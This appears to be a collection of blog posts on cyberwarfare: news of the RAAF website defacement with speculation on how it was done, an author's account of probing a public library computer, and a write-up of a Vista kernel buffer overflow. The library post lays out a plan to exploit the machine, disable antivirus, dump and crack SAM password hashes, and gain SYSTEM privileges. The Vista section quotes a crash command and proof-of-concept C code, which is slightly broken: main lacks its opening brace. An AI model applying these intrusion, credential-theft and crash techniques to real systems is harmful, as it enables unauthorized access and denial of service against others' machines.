Cyberwarfare Magazine

Atul Dwivedi, an Indian hacker paid a visit to the Royal Australian Air Force (RAAF) last Monday by defacing their website.

This accident comes amid a raise in violence targeted towards Indian native in Australia and apparently Dwivedi protested this situation by leaving a message on the website:

“This site has been hacked by Atul Dwivedi. This is a warning message to the Australian government. Immediately take all measures to stop racist attacks against Indian students in Australia or else I will pawn all your cyber properties like this one.”

Racist incident in Australia against Indian students has increased in the last months

This site is now up and running as per normal. Of course the webserver wasn’t connected to any internal network and didn’t contain any classified information according to a spokewoman:

“No sensitive information was compromised as the air force internet website is hosted on an external server and, as such, does not hold any sensitive information,¹“

Microsoft products are used in pretty much every Western armed forces. So it’s save to assume the webserver used by the RAAF is probably running IIS. Of course, IIS implies as Windows machine and a Windows Server machine means that everything is almost certainly all Microsoft based. Of course we can now verify those claims and according to David M Williams from ITWire² the website is hosted through Net Logistics, an Australian hosting company. The aforementioned article tries to explain the hack with the use of exploits. Which might have been the way Dwivedi did it, but the analysis is quite simple and lacks depth. The site still has an excellent link to a blog detailing the WebDAV exploit, see below for the link.

It’s not impossible to think that Dwivedi might have tricked someone into giving out too much information also. Social engineering can do lots and is usually easier than technical exploits. The Art of Deception by Kevin Mitnick should convince most people of that. Someone could look up on Facebook or another social networking site for some people in the RAAF and then try to pose as them and pose as them.

Then also, why not look for the FTP server? And God knows what else the server is running; maybe a SMTP server also (and probably it does). Now I wouldn’t suggest doing this, but running a port scan would probably reveal a lot of information. Moreover, using web vulnerability tools like Nikto could help find misconfigured settings in ASP or forgotten test/setup pages/files. Up to there, only two things are important: information gathering and imagination.

See also:

“Hacker breaks into RAAF website”, AAP, Brisbane Times, July 16, 2009, http://news.brisbanetimes.com.au/breaking-news-national/hacker-breaks-into-raaf-website-20090716-dmrn.html accessed on 2009-07-17

“WebDAV Detection, Vulnerability Checking and Exploitation”, Andrew, SkullSecurity, May 20, 2009, http://www.skullsecurity.org/blog/?p=285 accessed on 2009-07-17

Good day everyone,

For the past 6 months, I was on a very demanding course which cause me to stop writing to this blog. This was very unfortunate but the success of this particular course was very crucial to me. Now that it’s over, I’ll finally be able to resume writing articles on computer security and cyberwarfare. I’m sorry for the lack of news in the last months and hopefully, I’ll be able to regain your attention.

Thank you

This blog is gonna be quiet for the upcoming weeks, as the holidays kick in. But I’ll be back in January. Until them, Merry Christmas and happy New Year to all my readers. Health, Love and Success is what I wish to everyone of you, and thank you for being readers of this humble blog.

See you soon

Jon

I’ve return to the library to go a little bit further. So I opened up a command prompt and started the explorer shell. I plugged it my war key, it didn’t run automatically but it was still accessible.

To my astonishment, the OS as Windows XP SP2…no SP3. That’s nice to know. As expected, the network uses Active Directory and I’m logged as an anonymous user. McAfee is used and detected and erased things it didn’t liked on my key. Thank you McAfee, now I need to write my own stuff.

Version of Internet Explorer is 6.0. So if I was to continue this adventure I’d first start by owning the machine with some exploit by crafting a web page of an exploit for Windows SP2. That would be easily done by looking at Milw0rm. With root access to the machine, I could then install a sniffer and see what goodies I could get. Then I would map the network and see what I could do with the server.

But I like it to be clean, so it would be nice to actually have the password for the local admin…For that I would need to get my hands on the SAM file in C:\windows\system32\config. I don’t want to use NTFSDOS because I would have to reboot the computer and that would totally like suspicious. So I would use pwdump2 to get the hashes from the registry and would crack them at home. Another way I could use would to get the SYSTEM privileges, then I should just be able to copy the SAM file to my war key with ease. This could be done if I use the exploit to gain root, then use the AT command to schedule me a command prompt and restart explorer as SYSTEM.

One thing to remember would be to shut down McAfee before inserting the USB key, because it would delete all of my tools. Hopefully, this could be done my shutting down the McAfee Framework Service…and it would be accessible to my user level.

CNet reported not long ago about a new vulnerability found in the kernel of Vista[1]. The attack is a buffer overflow which corrupts the memory, and thus could be use for denial of service attacks. The report from Phion, the security company that reported the vulnerability, also states that the attack could be used to inject code[2].

There is a new vulnerability found in the kernel of Vista. The attack is a buffer overflow which corrupts the memory

The buffer overflow is caused by adding an IP address with an illegal subnet bits value to the IPv4 routing table: For example the following command will make Vista crash with a blue screen of death:

C:>route add 127.0.0.1/250 127.0.0.2

In the command above, we specified 254 as being the number of subnet bits, which is an illegal value. According to the vulnerability report by Thomas Unterleitner, the greater the value is, the quicker the crash is provoked[3].

The overflow is located into the CreateIpForwardEntry2 method which is part of the Iphlpapi library (Iphlpapi.dll). The problem arises because the method doesn’t verify the value of the PrefixLength property of DestinationPrefix specified in the MIB_IPFORWARD_ROW2 structure passed to the method. Therefore, the following code should crash the kernel[4]:

   1:  #define _WIN32_WINNT 0x0600
   2:  #define WIN32_LEAN_AND_MEAN
   3:  
   4:  #include <windows.h>
   5:  #include <winsock2.h>
   6:  #include <ws2ipdef.h>
   7:  #include <iphlpapi.h>
   8:  
   9:  #include <stdio.h>
  10:  #include <stdlib.h>
  11:  
  12:  int main(int argc, char** argv)
  13:  
  14:      DWORD               dwStatus;
  15:      MIB_IPFORWARD_ROW2 route;
  16:  
  17:      if (argc != 3)
  18:      {
  19:          printf("Usage: %s <ifNum> <numOfBits>\n\n", argv[0]);
  20:          return -1;
  21:      }
  22:  
  23:      InitializeIpForwardEntry(&route);
  24:  
  25:      route.InterfaceIndex = atoi(argv[1]);
  26:      route.DestinationPrefix.Prefix.si_family = AF_INET;
  27:  
  28:      route.DestinationPrefix.Prefix.Ipv4.sin_addr.s_addr
  29:  = inet_addr("1.2.3.0");
  30:      route.DestinationPrefix.Prefix.Ipv4.sin_family = AF_INET;
  31:  
  32:      route.DestinationPrefix.PrefixLength = atoi(argv[2]);
  33:  
  34:      route.NextHop.Ipv4.sin_addr.s_addr = inet_addr("11.22.33.44");
  35:      route.NextHop.Ipv4.sin_family        = AF_INET;
  36:  
  37:      route.SitePrefixLength        = 0;
  38:  
  39:      route.Protocol            = MIB_IPPROTO_NETMGMT;
  40:      route.Origin                = NlroManual;
  41:      route.ValidLifetime        = 0xffffffff;
  42:      route.PreferredLifetime        = 0xffffffff;
  43:      route.Metric                = 1;
  44:  
  45:      dwStatus = CreateIpForwardEntry2(&route);
  46:      return dwStatus;

In order for this code to work you must be in the Administrators group or in the Network Operators Group…so it’s of limited use for most people, but you never know…

NETIO!PtpCopyPartialKeys:
mov     edi,edi
push    ebp
mov     ebp,esp
movzx   eax,word ptr [ebp+10h]   ; = 0x00ee  PrefixLength in bits
add     eax,7
shr     eax,3
push    eax                      ; 0x0000001e PrefixLength in bytes
push    dword ptr [ebp+0Ch]      ; 0x934b7ac4 src buffer
push    dword ptr [ebp+8]        ; 0x83716398 dst buffer
; 83716398  00 00 00 00 00 00 00 00-05 00 06 04 45 76 65 ee
; 837163a8  01 00 00 00 01 00 00 00-78 81 15 83 00 00 00 00
; 837163b8  18 68 f0 8a 00 00 00 00-01 00 04 00 01 00 00 00
; ------------------------------------------------------------------
call    NETIO!memcpy
; memcpy(0x83716398, 0x934b7ac4, 0x0000001e) // BUFFER OVERFLOW!!!!
; ------------------------------------------------------------------
; 83716398  01 02 03 04 00 00 00 00-00 13 6c 83 48 7b 4b 93
; 837163a8  78 62 8b 85 00 13 6c 83-48 13 6c 83 78 00 00 00
; 837163b8  18 68 f0 8a 00 00 00 00-01 00 04 00 01 00 00 00
; compare the byte values with the src buffer printed before

add     esp,0Ch
pop     ebp
ret     0Ch
neg     ecx
push    ecx

Microsoft said it had no intention of patching this buffer overflow before the next Vista service pack[5]. This exploit doesn’t apply to Windows XP.

[2] “Microsoft VISTA TCP/IP stack buffer overflow”, Thomas Unterleitner, November 19, 2008, http://www.securityfocus.com/archive/1/498471 (accessed on November 25, 2008)

[3] Ibid.

[4] Ibid. Code by Thomas Unterleitner

[5] “Vista kernel is vulnerable”, Egan Orion, The Inquirer, November 24, 2008, http://www.theinquirer.net/gb/inquirer/news/2008/11/24/vista-kernel-vulnerable (accessed on November 25, 2008)